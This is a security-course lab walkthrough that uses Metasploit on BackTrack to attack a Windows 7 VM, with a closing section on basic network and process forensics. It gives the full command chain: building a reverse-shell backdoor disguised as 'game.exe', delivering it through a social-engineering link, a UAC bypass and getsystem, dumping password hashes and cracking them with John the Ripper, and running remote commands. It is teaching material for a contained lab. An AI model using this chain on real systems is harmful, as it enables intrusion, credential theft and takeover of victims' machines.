ComputerSecurityStudent (CSS) [Login] [Join Now]


|SECURITY TOOLS >> Metasploit >> Current Page |Views: 22119

(Metasploit: msfpayload backdoor)

{ BackTrack5R1: Create Executable, Get SYSTEM & Password On Windows 7 }

Section 0. Background Information
  1. What is Metasploit?
    • The Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world's largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems.
     
  2. What is John the Ripper?
    • John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes.

  3. Background 
    • This lab is to illustrate two unfortunate scenarios. 
    • First, our regular userIDs that we use for our daily computer activities (surfing, word processing, etc) should not have Administrative Privileges. 
    • Second, downloading and playing games from a weblink can get extremely dangerous in a hurry. 
    • These two scenarios together could create a perfect storm that would let an attacker (1) maliciously send a link out to many victims, (2) gain access to their machines, and (3) basically do what ever they want. 

  4. Pre-Requisite Lab
    1. BackTrack: Lesson 1: Installing BackTrack 5 R1
    2. Windows 7: Lesson 1: Installing Windows 7
     
  5. Lab Notes
    • In this lab we will do the following:
      1. Create an executable with msfpayload
      2. Place the executable on an Apache Web Server
      3. Establish a Metasploit Listener
      4. Use Meterpreter to gain SYSTEM Privileges
      5. Use Meterpreter to gain Password Hashes
      6. Use John the Ripper to crack Password Hashes
      7. Use Meterpreter to execute commands
      8. Use Meterpreter shell to display a system message

  6. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2014 No content replication of any kind is allowed without express written permission.

 

Section 1. Start your Windows 7 VM
  1. Edit Virtual Machine Settings
    • Instructions
      1. Click on Windows 7
      2. Click on Edit virtual machine

     

  2. Configure Network Adapter
    • Instructions
      1. Select Network Adapter
      2. Click the radio button "Bridged: Connected directly to the physical network."
      3. Click the Okay button

     

  3. Start Windows 7
    • Instructions
      1. Click on Windows 7
      2. Click on Play virtual machine

     

Section 2. Login to Windows 7
  1. Login
    • Instructions:
      1. Enter Password
      2. Click the Blue Arrow

 

Section 3. Verify you have a Network IP Address
  1. Bring up Command Prompt
    • Instructions:
      1. Click the Start Button
      2. Type "cmd" in the search box
      3. Right Click on cmd
      4. Click on "Run as administrator"

     

  2. User Account Control
    • Instructions:
      1. Click the Yes Button

     

  3. Verify IP Address
    • Instructions:
      1. ipconfig
    • Notes(FYI):
      1. In my case, my IP Address is 192.168.1.106.
      2. In your case, your IP Address will be different.

 

Section 4. Create Un-Safe Password
  1. Bring up Command Prompt
    • Instructions:
      1. net users
      2. net users student abc123
      3. net users Administrator 123456
    • Notes(FYI):
      1. You can use the net user command to create and modify user accounts on computers. When you use this command without command-line switches, the user accounts for the computer are listed.
      2. Set the password to "abc123" for the student userid.
      3. Set the password to "123456" for the Administrator userid.

 

Section 5. Configure BackTrack Virtual Machine Settings
  1. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

 

Section 6. Play and Login to BackTrack
  1. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

     

Section 7. Open Console Terminal and Retrieve IP Address
  1. Start up a terminal window (On BackTrack5R1)
    • Instructions:
      1. Click on the Terminal Window

     

  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.112.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine.

 

Section 8. Start Apache Web Server
  1. Start Apache
    • Instructions:
      1. service apache2 start
      2. ps -eaf | grep apache2 | grep -v grep
    • Notes(FYI):
      1. service apache2 start; This starts the apache web service.
      2. ps -eaf | grep apache2; This show all the running apache processes.
      3. | grep -v grep; Ignore the actual grep process.

 

Section 9. Create msfpayload Backdoor
  1. Create the msfpayload
    • Instructions:
      1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.112 LPORT=4444 x > /var/www/game.exe
        • Replace 192.168.1.112 with BackTrack's IP address obtained from (Section 7, Step 2).
      2. ls -l /var/www/game.exe
      3. chmod 744 /var/www/game.exe
      4. ls -l /var/www/game.exe
    • Notes(FYI):
      • windows/meterpreter/reverse_tcp is the msfpayload
      • LHOST specifies the BackTrack Server that the TCP traffic will be sent to.
      • LPORT specifies the port number of the IP address that the TCP traffic will be sent to.

 

Section 10. Start msfconsole and listener
  1. Start msfconsole
    • Instructions:
      1. msfconsole

     

  2. Start Exploit listener
    • Notes(FYI):
      • Replace 192.168.1.112 with BackTrack's IP address obtained from (Section 7, Step 2).
    • Instructions:
      1. use exploit/multi/handler
      2. set PAYLOAD windows/meterpreter/reverse_tcp
      3. set LHOST 192.168.1.112
        • Replace 192.168.1.112 with BackTrack's IP address obtained from (Section 7, Step 2).
      4. set LPORT 4444
      5. exploit
      6. Continue to the next section!!!

 

Section 11. Start Internet Explorer
  1. Start Internet Explorer (On the Window's 7 VM)
    • Instructions:
      1. Click the Start Button
      2. Type "Internet Explorer" in the search box
      3. Click Internet Explorer

     

  2. Run Game
    • Instructions:
      1. Place the following link in the Address Bar
        • http://192.168.1.112/game.exe
        • Replace 192.168.1.112 with BackTrack's IP address obtained from (Section 7, Step 2).
      2. Click the Run Button
    • Notes(FYI):
      1. This is where the social engineering could take place.  Imagine a scenario where you get an email from a friend, with an embedded link that says click here to play this new game.

     

  3. Internet Explorer - Security Warning
    • Instructions:
      1. Click Run
      2. Continue to Next Section
    • Notes(FYI):
      1. Notice this is a "Internet Explorer - Security Warning", which is not tripping the Windows Firewall.

     

Section 12. Meterpreter Reconnaissance 
  1. Get System Information
    • Instructions:
      1. sysinfo
    • Note(FYI):
      1. sysinfo consists of the following: Computer Name, Operating System, Hardware Architecture, and System Language.

     

  2. Get UserID
    • Instructions:
      1. getuid
    • Note(FYI):
      1. getuid provides the username.

 

Section 13. Escalate User Privilege 
  1. Viewing Sessions
    • Instructions:
      1. background
      2. sessions -l
        • "l" as in lamb.
    • Note(FYI):
      1. Using the background command places the current session into the background and brings us back to the Metasploit console without terminating the session.
      2. sessions -l, allow a user to view all the established metasploit sessions.

     

  2. Viewing Sessions
    • Instructions:
      1. use post/windows/escalate/bypassuac
      2. show options
      3. set LHOST 192.168.1.112
        • Replace 192.168.1.112 with BackTrack's IP address obtain from (Section 7, Step 2).
      4. set SESSION 1
        • "1" as in the number one.
      5. run
    • Note(FYI):
      1. This is a post-exploitation module that Escalates the UAC (User Account Control) Protection Bypass.

     

  3. Get SYSTEM
    • Instructions:
      1. Press <Enter>
      2. sessions -l
        • "l" as in lamb.
      3. sessions -i 2
      4. getuid
        • Notice the username is student.
      5. getsystem
      6. getuid
        • Notice the username is now SYSTEM, which has Administrator privileges.
    • Note(FYI):
      1. The 'getsystem' command allows you to escalate the current session to the SYSTEM account from an administrator user account.
      2. This is why your general user account should not have administrative privileges.

 

Section 14. Display Password Hashes 
  1. Show Processes
    • Instructions:
      1. ps
      2. Record the PID for winlogon.exe.  Mine is 448.
    • Note(FYI):
      1. ps display all the system processes similar to windows tasklist.exe

     

  2. Run Hashdump
    • Instructions:
      1. migrate 448
        • Replace 448 with your winlogon.exe process ID obtain from the previous step.
      2. run hashdump
      3. Highlight the password hashes, Then Right Click
      4. Click Copy

     

  3. Open gedit
    • Instructions:
      1. Applications --> Accessories --> gedit Text Editor

     

  4. Paste Hash
    • Instructions:
      1. Edit --> Paste

     

  5. Save File
    • Instructions:
      1. File --> Save As...
      2. Name: windows7_hash.txt
      3. Click the Save Button

     

  6. Close File
    • Instructions:
      1. File --> Close

 

Section 15. Crack Password Hashes with "John the Ripper" 
  1. Start up a terminal window (On BackTrack5R1)
    • Instructions:
      1. Click on the Terminal Window
    • Note(FYI):
      1. It's not necessary to create another terminal window.
      2. Its nice to separate your Metasploit sessions from your John the Ripper work.
     
  2. John The Ripper
    • Instructions:
      1. /pentest/passwords/john/john --format=NT /root/windows7_hash.txt
    • Notes(FYI):
      1. John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords.

 

Section 16. Execute Windows Commands from Metasploit 
  1. Execute Windows Commands (On BackTrack5R1)
    • Instructions:
      1. execute -f calc.exe
      2. execute -f cmd.exe
    • Notes(FYI):
      1. The above command will pop up a calculator and command prompt on the Windows 7 Victim.

     

  2. Viewing Executed Windows Commands (On the Windows 7 VM)
    • Note(FYI):
      1. You should see both a calculator and command prompt.

 

Section 17. Execute Windows System Message 
  1. Execute Windows System Message (On the BackTrack VM)
    • Instructions:
      1. shell
      2. msg * You have been hacked... zProfess0R
    • Note(FYI):
      1. The "shell" command will provide you essentially a window command prompt.

     

  2. View Windows System Message (On the Windows 7 VM)
    • Note(FYI):
      1. You should see a windows Message, stating "You have been hacked... zProfessOR"

 

Section 18. Basic Network Forensics 
  1. Basic Network Forensics (On the BackTrack VM)
    • Instructions:
      1. netstat -nao
    • Notes(FYI):
      1. Notice the ESTABLISHED Metasploit Session (See Below)

 

Section 19. Proof of Lab
  1. Proof of Lab (Basic Process Forensics)
    • Notes(FYI):
      1. See picture before running commands
    • Instructions:
      1. netstat -nao | findstr ":4444"
      2. tasklist | findstr "3300"
        • Replace 3300 with the first process ID returned by netstat.
      3. tasklist | findstr "2168"
        • Replace 2168 with the second process ID returned by netstat.
      4. date /t
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions:
      1. Do a PrtScn
      2. Paste into a word document
      3. Upload to Moodle

     

  2. Terminate Metasploit Session
    • Instructions:
      1. exit
      2. exit -y
      3. exit -y

     


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth